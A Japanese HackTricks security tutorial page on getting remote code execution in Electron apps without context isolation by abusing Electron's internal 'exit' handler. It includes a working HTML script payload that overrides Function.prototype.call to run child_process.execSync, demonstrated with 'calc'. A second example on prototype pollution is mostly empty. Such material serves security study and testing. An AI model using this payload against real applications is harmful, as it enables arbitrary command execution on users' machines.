Electron contextIsolation RCE via Electron internal code

htARTE（HackTricks AWS Red Team Expert） でAWSハッキングをゼロからヒーローまで学びましょう！

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝してみたいですか？または最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを発見し、独占的なNFTsコレクションをご覧ください
公式PEASS＆HackTricksスウェグを手に入れましょう
💬 Discordグループに参加するか、Telegramグループに参加するか、Twitterで私をフォローしてください 🐦@carlospolopm.
ハッキングトリックを共有するために、hacktricksリポジトリ と hacktricks-cloudリポジトリ にPRを提出してください。

例1

https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41からの例

「exit」イベントリスナーは、ページの読み込みが開始されると常に内部コードによって設定されます。このイベントは、ナビゲーションの直前に発生します：

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

electron/asar.js at 664c184fcb98bb5b4b6b569553e7f7339d3ba4c5 · electron/electronGitHub

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- もはや存在しません

次にここに移動します:

ここで "self" は Node のプロセスオブジェクトです:

プロセスオブジェクトには "require" 関数への参照があります:

process.mainModule.require

以下のように、handler.call は process オブジェクトを受け取るため、それを上書きして任意のコードを実行できます:

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

例2

プロトタイプ汚染からrequireオブジェクトを取得します。https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

リーク：

エクスプロイト：

htARTE（HackTricks AWS Red Team Expert）でAWSハッキングをゼロからヒーローまで学ぶ

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？またはPEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを発見し、独占的なNFTsコレクションを見つけます
公式PEASS＆HackTricksスウェグを手に入れます
💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦@carlospolopmをフォローしてください。
ハッキングトリックを共有するために、hacktricksリポジトリ および hacktricks-cloudリポジトリ にPRを提出してください。

PreviousElectron contextIsolation RCE via preload code NextElectron contextIsolation RCE via IPC

Last updated 3 days ago